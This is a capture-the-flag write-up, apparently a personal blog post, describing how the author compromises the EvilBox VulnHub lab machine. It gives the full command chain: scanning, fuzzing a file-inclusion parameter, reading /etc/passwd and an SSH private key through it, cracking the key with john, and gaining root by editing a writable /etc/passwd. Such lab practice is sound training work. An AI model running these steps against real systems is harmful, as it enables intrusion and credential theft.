offsecvulnhub

How I took down EvilBox from vulnhub

Overview:

Target Machine IP Address: 192.168.56.120
My Machine IP Address: 192.168.56.117

Mission:

Boot to Root

1. To get a user and a root flag
2. To get root access

Description:

As a preparation for the upcoming CEH practical Exam, I am going to take down this box. It is rated as easy so let me drive into it. Because I want to increase my craving. 
Once I gets comfortable with the easy boxes, I want to go with medium or hard box. By the way, beginning of June, I will be playing medium boxes.

Level: Easy

Easy

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

Since the machine spits the IP address directly when it boots, so we don’t have to do anything.

Target IP: 192.168.56.120

nmap -sC -sV -p- -Pn 192.168.56.120 -o nmap.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 10:31 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
| 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
| 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds

Since there is an Apache web server running, so let’s do a scanning (with my favorite tool gobuster and dirsearch. I hope you remember gobuster was not able to detect one important thing that was detected by dirsearch; here is the link to that writeup )

gobuster dir -u http://192.168.56.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

Output

dirsearch -u http://192.168.56.120 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

Output

 

http://192.168.56.200/robots.txt

Hello H4x0r

http://192.168.56.200/secret


I was not able to find anything. Let’s check whether there are any files or folders in http://192.168.56.120/secret/

gobuster dir -u http://192.168.56.120/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_secret.log

Output

Yes, you might see nothing, but that is not because the tool is bad but because remember, we are using different wordlists. (To be honest, I don’t want to miss any)

dirsearch -u http://192.168.56.120/secret/ -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

We found something 😉

http://192.168.56.120/secret/evil.php

We need to find the GET parameter in the URL. We could use WFUZZ or ffuf. This time, we shall try FFUF.

Want to know more about FFUF
https://www.youtube.com/watch?v=aN3Nayvd7FU&ab_channel=InsiderPhD
https://www.youtube.com/watch?v=iLFkxAmwXF0&ab_channel=codingo
https://www.youtube.com/watch?v=9Hik0xy9qd0&ab_channel=HackerSploit

ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=test_value' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 4242

-c colorized output

-r  follow redirects (default is set to false)

-u Target URL

-w Wordlist file path and (optional) keyword separated by colon. eg. ‘/path/to/wordlist:KEYWORD’

-ac Automatically calibrate filtering options (default: false)

-fs Filter HTTP response size. Comma separated list of sizes and ranges

It spits lot of gibberish. Therefore, we could change the 4242 to 0 to negate the gibberish.  However, it still not giving us any useful information. So all we could do is, let’s try test_value to something like /etc/passwd which we usually use to test whether there is command execution is available.

Let’s try this one.

ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 200

It does spit out lot of information. Let’s keep -fs 0 to not to show all output (or show only the thing which we found as GET parameter)

ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

Output

By the way, this command also does work

ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -ac

 

Yippy!! We got the GET parameter. It is command. Let’s try to access the machine through the URL on browser.

view-source:http://192.168.56.120/secret/evil.php?command=/etc/passwd

The machine has command execution problem.

We got a username (mowree; may be we could keep it for sometime, because who knows it could prove useful during later).

Since, we are able to view /etc/passwd, let’s browse around and try to get the user flag (user.txt is my guess, let’s see) Sad. It didn’t work. Since from the nmap result we know that the openssh is running on the victim machine. Let’s check whether we get any keys (you know, the default key name for public key is id_rsa.pub and id_rsa is the default private key).

P.S. I tried to view what is there in the evil.php using php filter function (which is normally used during the LFI attack). Since there is nothing information, so I didn’t mention it here.

view-source:http://192.168.56.120/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==" | base64 -d 

<?php
$filename = $_GET['command'];
include($filename);
?>

I also tried to check the bash_history (/home/mowree/.bash_history)

view-source:http://192.168.56.120/secret/evil.php?command=/home/mowree/.bash_history

Didn’t found anything useful 🙁

Anyway, good news that we got the private key.

Download the file:

curl http://192.168.56.120/secret/evil.php?command=/home/mowree/.ssh/id_rsa -o id_rsa


chmod 600 id_rsa

Since, we know the username for the machine is mowree and we got the private key, let’s try whether we can log into the machine through ssh or not.

ssh -i id_rsa mowree@192.168.56.120

We need to extract the password using john the ripper

ssh2john id_rsa > hash

john -w=/usr/share/wordlists/rockyou.txt hash

john --show hash

Let’s try the ssh again.
ssh -i id_rsa mowree@192.168.56.120

We got the user flag.

user flag: 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

Now we need to enumerate (You could do it manually using some of my favorite onliners. However, here it is raining lightly and as soon it stops I am plan to go the school library. So, my plan is to complete the box before I leave. Oh by the way, I am in our apartment’s private study room. This is my second time to visit and play with boxes. It’s too quite and no people around, feels little eerie you know what I mean 🙂 )

I have uploaded the linpeash.sh from my Kali Linux machine.

And I ran the script.

bash linpeash.sh

passwd file is writeable (which means an easy root). Let’s try to change some entries in the /etc/passwd

First we need a password for user sam (which we never had created. Initially I thought to create a user on the victim machine but you know all system level commands require sudo privilege which is absent for the current user).

nano /etc/passwd

copy the line of root user (root:x:0:0:root:/root:/bin/bash) and paste it somewhere bottom, for the ease of use.

change the root to sam. Next, we need to replace the x (which is placeholder for the password with our new password)

By the way, generate the password using the following command.

openssl passwd HackThePlanet!

replace the value ($1$nLNTaLhW$2PHtGQ3xF.ScdoGbq2Lkd0) with the x, in /etc/passwd.

use control+x and press Y, to get out of nano and save the changes.

su sam

we are root!!

root flag: 36QtXfdJWvdC0VavlPIApUbDlqTsBM

It’s close to 8PM now, I am think whether I should goto library now or just call it a day lol Anyway, see you in the next post 🙂

 

 

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Close
Back to top button